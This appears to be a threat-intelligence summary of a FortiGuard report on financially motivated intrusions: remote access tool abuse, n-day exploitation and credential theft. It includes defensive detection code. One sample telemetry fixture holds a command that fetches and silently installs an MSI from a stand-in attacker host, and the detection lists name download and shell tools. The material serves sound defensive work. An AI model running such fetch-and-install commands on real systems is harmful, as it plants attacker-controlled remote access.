Full Report
FortiGuard IR analysis of H1 2025 shows financially motivated actors increasingly abusing valid accounts and legitimate remote access tools to bypass detection, emphasizing the need for identity-centric defenses.
Analysis Summary
# Tool/Technique: Legitimate Remote Access Tools Abuse
## Overview
Financially motivated threat actors in H1 2025 are relying heavily on dropping and using legitimate remote access software (remote monitoring and management (RMM) and remote desktop tools) rather than custom malware implants to maintain persistence and control within compromised environments. Because the same tools are used daily by IT teams and managed service providers, their presence and their network traffic blend in with normal business activity.
## Technical Details
- Type: Technique (Tool Abuse)
- Platform: Windows (not stated explicitly in the excerpt; inferred from the tools named, which are deployed mainly on Windows endpoints and servers in enterprise environments reached over VPN)
- Capabilities: Establishing remote foothold, secondary persistence, and interactive command execution.
- First Seen: Not explicitly stated for the current abuse trend, but the tools themselves have been widely available.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1133 - External Remote Services
- TA0003 - Persistence
- T1543.003 - Create or Modify System Process: Windows Service (If installed as a service)
- TA0011 - Command and Control
- T1219 - Remote Access Software (the tool's client connects outbound to the vendor's relay infrastructure, which becomes the attacker's control channel; T1090 Proxy applies only if the tool is additionally used to pivot)
- TA0005 - Defense Evasion
- T1218 - System Binary Proxy Execution (ATT&CK's current name; a loose fit, since the evasion comes from the tools being vendor-signed and commonly allow-listed rather than from proxying execution through a Windows system binary)
## Functionality
### Core Capabilities
- **Remote Control:** Providing interactive sessions for threat actors to manually control victim systems.
- **Persistence:** Establishing a stable foothold that survives reboots, often by installing the legitimate tool's client or service.
### Advanced Features
- **Stealth/Evasion:** Leveraging well-known, often allow-listed business applications (AnyDesk, Splashtop, Atera) to bypass signature-based defenses; the tools' outbound connections to vendor relay infrastructure look like ordinary remote support sessions.
- **Versatility:** AnyDesk, Atera, Splashtop and ScreenConnect are widely used by IT teams and managed service providers for remote management, so their presence on a host is far less suspicious than a custom implant.
## Indicators of Compromise
- File Hashes: N/A (Focus is on the legitimate tooling)
- File Names: AnyDesk, Atera, Splashtop, ScreenConnect (instances dropped or configured by the attacker)
- Registry Keys: N/A
- Network Indicators: The software's standard outbound connections to the vendor's relay/cloud infrastructure, but from hosts or accounts that do not normally run remote support sessions, or sessions reaching internal resources that such tooling is not expected to touch.
- Behavioral Indicators: Installation of new remote access services/clients by users or accounts not typically responsible for system administration; connections initiated to known domains associated with these remote support tools from unusual accounts.
## Associated Threat Actors
- Financially Motivated Actors (General reference, specific groups not named in the excerpt).
## Detection Methods
- **Behavioral detection:** Monitoring for the installation or execution of legitimate remote access software by unexpected users or from unexpected initial access points (e.g., following a VPN login).
- **Network monitoring:** Baselining which hosts and accounts legitimately connect to each vendor's relay infrastructure, and alerting on sessions that deviate from that pattern (new hosts, off-hours sessions, sessions from accounts that are not administrators).
- **Application Whitelisting/Control:** Strict policies limiting which applications are permitted to install or execute.
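The behavioral detection described above, implemented over constructed sample telemetry as an added example (not FortiGuard's code or tooling): it matches process launches against the tool names in the report and applies two checks, whether the launching account is on an assumed list of accounts permitted to deploy RMM software, and whether that account completed a VPN logon from outside an assumed country baseline within the preceding 30 minutes. The event layout, the admin set, the country baseline and the 30-minute window are all assumptions to be replaced with your own.

```python
"""Flag remote access tool launches that look like attacker-deployed footholds.

Added example, not FortiGuard's code. Correlates process-creation events with
VPN logons and alerts when a remote access tool named in the report runs under
an account not expected to deploy such tooling, or shortly after that account's
VPN logon from an unexpected country. All field layouts and events are constructed.
"""
from datetime import datetime, timedelta

# Product names from the report, matched case-insensitively against the image path.
RMM_PRODUCTS = ("anydesk", "atera", "splashtop", "screenconnect")

# Assumptions for this example: accounts allowed to deploy RMM tooling and the
# countries staff normally connect from.
ADMIN_USERS = {"it.admin", "svc_rmm"}
EXPECTED_COUNTRIES = {"US"}

# Constructed VPN logons: (ISO timestamp, user, source country).
VPN_LOGONS = [
    ("2025-03-04T08:02:11", "j.doe", "RU"),
    ("2025-03-04T09:15:40", "it.admin", "US"),
]

# Constructed process-creation events: (ISO timestamp, host, user, image, parent image).
PROC_EVENTS = [
    ("2025-03-04T08:09:30", "WS-114", "j.doe",
     r"C:\Users\j.doe\AppData\Roaming\AnyDesk\AnyDesk.exe", "explorer.exe"),
    ("2025-03-04T09:20:05", "SRV-07", "it.admin",
     r"C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe", "services.exe"),
    ("2025-03-04T10:00:00", "WS-201", "m.lee",
     r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe", "services.exe"),
    ("2025-03-04T10:05:00", "WS-201", "m.lee",
     r"C:\Windows\System32\notepad.exe", "explorer.exe"),
]


def is_rmm_tool(image: str) -> bool:
    """True when the image path contains one of the report's tool names."""
    name = image.lower()
    return any(product in name for product in RMM_PRODUCTS)


def detect(proc_events, vpn_logons, admins=ADMIN_USERS,
           expected_countries=EXPECTED_COUNTRIES, window=timedelta(minutes=30)):
    """Return one alert per RMM launch that fails either check, with the reasons."""
    alerts = []
    for ts, host, user, image, parent in proc_events:
        if not is_rmm_tool(image):
            continue
        started = datetime.fromisoformat(ts)
        reasons = []
        if user not in admins:
            reasons.append("non_admin_user")
        for logon_ts, logon_user, country in vpn_logons:
            logon_at = datetime.fromisoformat(logon_ts)
            recent = timedelta(0) <= started - logon_at <= window
            if logon_user == user and recent and country not in expected_countries:
                reasons.append(f"vpn_from:{country}")
        if reasons:
            alerts.append({"time": ts, "host": host, "user": user,
                           "image": image, "parent": parent, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(PROC_EVENTS, VPN_LOGONS):
        print(alert["time"], alert["host"], alert["user"], alert["reasons"])
```

On the sample data the AnyDesk launch by j.doe fires on both checks and the Splashtop service under m.lee fires on the account check alone; the ScreenConnect client installed by it.admin after a US logon is left alone. In production the admin set should come from your PAM or AD group membership rather than a literal.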
## Mitigation Strategies
- **Identity-centric Defenses:** Strengthening multi-factor authentication (MFA) across all access vectors, especially VPNs.
- **Access Control:** Implementing Zero Trust principles and robust Privileged Access Management (PAM).
- **Behavioral Monitoring:** Deploying solutions capable of User and Entity Behavior Analytics (UEBA) to detect anomalous logins (e.g., valid accounts logging in from unusual geographic locations or at unusual times) leading to tool execution.
- **VPN Hardening:** Tightly controlling which accounts can utilize external remote services like VPNs.
## Related Tools/Techniques
- Compromised Credentials (T1078.002 - Valid Accounts: Domain Accounts, T1078.003 - Valid Accounts: Local Accounts, T1078.004 - Valid Accounts: Cloud Accounts)
- Phishing (Credential Harvesting)
- Infostealers (for initial credential theft)
- Legitimate Access Tools mentioned: AnyDesk, Atera, Splashtop, ScreenConnect.
---
# Tool/Technique: Exploitation of Public-Facing Applications (N-Day)
## Overview
Financially motivated actors are frequently exploiting known, unpatched vulnerabilities (overwhelmingly n-day exploitation) in public-facing applications to gain initial access, which is then immediately leveraged to deploy legitimate remote management software rather than deploying custom malware.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Public-facing servers/appliances (VPNs, web servers, exposed services).
- Capabilities: Gaining initial unauthorized access to the internal network perimeter.
- First Seen: Ongoing methodology, exploiting known vulnerabilities.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (T1190 has no sub-techniques)
## Functionality
### Core Capabilities
- **Perimeter Breach:** Successfully running exploit code against vulnerable internet-facing services.
- **Foothold Establishment:** Using the command execution obtained from the exploit only to download and run secondary, legitimate remote access tools, so that no custom implant ever touches disk.
### Advanced Features
- **N-Day Focus:** Targeting vulnerabilities that already have published exploit code or reliable information, reducing the development time required for an attack.
## Indicators of Compromise
- File Hashes: N/A (Focus is on exploitation)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic patterns unique to the exploitation of specific CVEs against perimeter devices.
- Behavioral Indicators: Unusual process creation or file drops immediately following traffic directed at known vulnerable services.
## Associated Threat Actors
- Financially Motivated Actors (General reference).
## Detection Methods
- **Exposure Inventory:** Knowing which internet-facing services are unpatched against published vulnerabilities tells defenders where exploit attempts must be watched for; applying the patches themselves is a mitigation (below).
- **Network Traffic Analysis:** Monitoring inbound traffic for payloads or sequences indicative of known exploit attempts against perimeter systems.
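One way to catch the exploit-to-tool-download sequence in endpoint telemetry, as an added example (not FortiGuard's code): walk each process's parent chain and alert when a shell, downloader or installer has an internet-facing service process anywhere among its ancestors. The service and child lists, the process events and the 198.51.100.23 download host are constructed assumptions.

```python
"""Flag command execution descended from an internet-facing service process.

Added example, not FortiGuard's code. After an n-day exploit the first thing
that usually shows in telemetry is the web or application server process
spawning a shell, a downloader or an installer. Lists and events are constructed.
"""

# Image names of processes that serve internet-facing applications (assumption).
EXPOSED_SERVICES = {"w3wp.exe", "httpd", "nginx", "java", "tomcat9.exe", "php-fpm"}

# Children that mean "run a command" or "fetch and install something" (assumption).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "sh", "bash", "curl.exe", "curl",
                       "wget", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}

# Constructed process-creation events: (pid, ppid, image, command line).
# 198.51.100.23 is a documentation address standing in for an attacker host.
EVENTS = [
    (4, 0, r"C:\Windows\System32\services.exe", "services.exe"),
    (400, 4, r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
    (512, 400, r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c curl -o C:\Windows\Temp\setup.msi http://198.51.100.23/setup.msi"),
    (520, 512, r"C:\Windows\System32\curl.exe",
     r"curl -o C:\Windows\Temp\setup.msi http://198.51.100.23/setup.msi"),
    (530, 512, r"C:\Windows\System32\msiexec.exe",
     r"msiexec /i C:\Windows\Temp\setup.msi /qn"),
    (300, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    (610, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe"),  # interactive admin shell, benign
]


def basename(image: str) -> str:
    """Lower-cased file name regardless of Windows or POSIX separators."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def build_table(events):
    """Map pid -> (ppid, image, cmdline) for ancestry lookups."""
    return {pid: (ppid, image, cmdline) for pid, ppid, image, cmdline in events}


def ancestry(pid, table, max_depth=32):
    """Yield image basenames from the process up to the root (or a missing parent).

    max_depth guards against ppid cycles from reused pids in long-running telemetry.
    """
    depth = 0
    while pid in table and depth < max_depth:
        ppid, image, _ = table[pid]
        yield basename(image)
        pid = ppid
        depth += 1


def detect(events):
    """Return alerts for suspicious children with an exposed service in their chain."""
    table = build_table(events)
    alerts = []
    for pid, ppid, image, cmdline in events:
        if basename(image) not in SUSPICIOUS_CHILDREN:
            continue
        chain = list(ancestry(pid, table))
        exposed = [name for name in chain if name in EXPOSED_SERVICES]
        if exposed:
            alerts.append({"pid": pid, "image": basename(image), "cmdline": cmdline,
                           "chain": " <- ".join(chain), "exposed_ancestor": exposed[0]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["pid"], alert["chain"], "|", alert["cmdline"])
```

Walking the full chain rather than checking only the immediate parent is what catches the curl and msiexec processes here: their parent is cmd.exe, and only the grandparent is w3wp.exe. The interactive cmd.exe under explorer.exe is not reported.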
## Mitigation Strategies
- **Vulnerability Management:** Aggressive patching schedules, especially for internet-facing assets.
- **Network Segmentation:** Ensuring exploited public-facing services are strictly segmented from critical internal assets.
- **Defense in Depth:** Employing WAFs or IPS systems configured to detect N-day exploits.
## Related Tools/Techniques
- Valid Account Abuse (often used post-exploitation using the initial access gained).
---
# Tool/Technique: Credential Harvesting & Purchase
## Overview
The primary source of initial access for financially motivated groups remains already-compromised credentials, obtained through phishing campaigns, through password reuse (a password exposed in a third-party breach that also works against the organization's VPN or email), or by purchasing them from Initial Access Brokers (IABs).
## Technical Details
- Type: Technique (Credential Acquisition)
- Platform: Varies (Email, web services, endpoint credential stores).
- Capabilities: Obtaining valid username/password pairs for network entry.
- First Seen: Ongoing.
## MITRE ATT&CK Mapping
- TA0043 - Reconnaissance
- T1589.001 - Gather Victim Identity Information: Credentials (credentials bought from IABs or found in breach dumps)
- TA0006 - Credential Access
- T1555 - Credentials from Password Stores (infostealers harvesting saved browser and application credentials)
- TA0001 - Initial Access
- T1566 - Phishing (credential-harvesting campaigns)
- T1078.002 - Valid Accounts: Domain Accounts (leveraging the stolen credentials for VPN access)
## Functionality
### Core Capabilities
- **Phishing:** Executing campaigns to harvest credentials directly from users.
- **IAB Acquisition:** Purchasing lists of compromised organizational credentials.
### Advanced Features
- **Credential Reuse Identification:** Utilizing credentials found online that match internal organizational accounts.
## Indicators of Compromise
- Behavioral Indicators: Successful logins via services like VPNs from unknown or unusual geographic locations immediately following an observed credential exposure event (linking purchased data to active compromise).
## Associated Threat Actors
- Financially Motivated Actors.
## Detection Methods
- **External Monitoring:** Monitoring dark web marketplaces and IAB forums for mentions of the organization's domains or credentials.
- **Anomaly Detection:** Detecting login attempts using credentials flagged as previously exposed in external leaks.
## Mitigation Strategies
- **MFA Mandate:** Enforcing MFA everywhere, especially on VPN access, as the single most effective defense against stolen credentials.
- **User Training:** Continuous security awareness training focused on credential security and phishing recognition.
- **Credential Monitoring:** Implementing services to monitor for organizational credential leaks externally.
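A way to implement the "credentials flagged as previously exposed" check at password-set or authentication time, as an added example (not FortiGuard's code): the k-anonymity range protocol used by Have I Been Pwned's Pwned Passwords service, in which only the first five hex characters of the password's SHA-1 digest leave the host and the comparison of the remaining 35 is done locally. The range data below is a constructed stand-in for a server response (the "password" suffix is its real SHA-1 suffix, the counts are made up); the online fetcher is included for reference but is not exercised.

```python
"""Check a credential against a breach corpus without revealing it.

Added example, not FortiGuard's code. Client side of the k-anonymity range
protocol: hash, send a 5-character prefix, compare suffixes locally.
SAMPLE_RANGES is a constructed stand-in for a server response.
"""
import hashlib
import urllib.request

# Constructed range data keyed by 5-char prefix; each line is "SUFFIX:COUNT".
# The first suffix is the real one for "password"; all counts are made up.
SAMPLE_RANGES = {
    "5BAA6": "\r\n".join([
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493",
        "0035B96AC28C5CE1F9E0E0B1D6C5C2C9D09:2",
        "00D4F6E8FA6EECAD2A3AA415EEC418D38EC:7",
    ]),
}


def sha1_hex(password: str) -> str:
    """Upper-case hex SHA-1, the digest form the range protocol uses."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def fetch_range_offline(prefix: str) -> str:
    """Offline lookup used by the example; returns "" for unknown prefixes."""
    return SAMPLE_RANGES.get(prefix, "")


def fetch_range_online(prefix: str) -> str:
    """Real lookup (not called here). Add-Padding pads the response so a
    network observer cannot infer the prefix from the response size."""
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"Add-Padding": "true", "User-Agent": "example-credential-check"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch_range=fetch_range_offline) -> int:
    """Number of times the password appears in the corpus (0 if unseen)."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count or 0)  # padded entries carry a count of 0
    return 0


def is_acceptable(password: str, fetch_range=fetch_range_offline) -> bool:
    """Reject any password that has appeared in a breach."""
    return breach_count(password, fetch_range) == 0


if __name__ == "__main__":
    for candidate in ("password", "xK9#vL2$pQ7@mN4!"):
        print(candidate, "->", "rejected" if not is_acceptable(candidate) else "ok")
```

Failing this check blocks the weakest passwords at the moment they are set; it does not replace MFA on the VPN, which is the control that stops a credential that leaks after it was set.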
## Related Tools/Techniques
- Infostealers (tools used to harvest credentials locally).
- VPN Services (as the common vector for leveraging stolen credentials).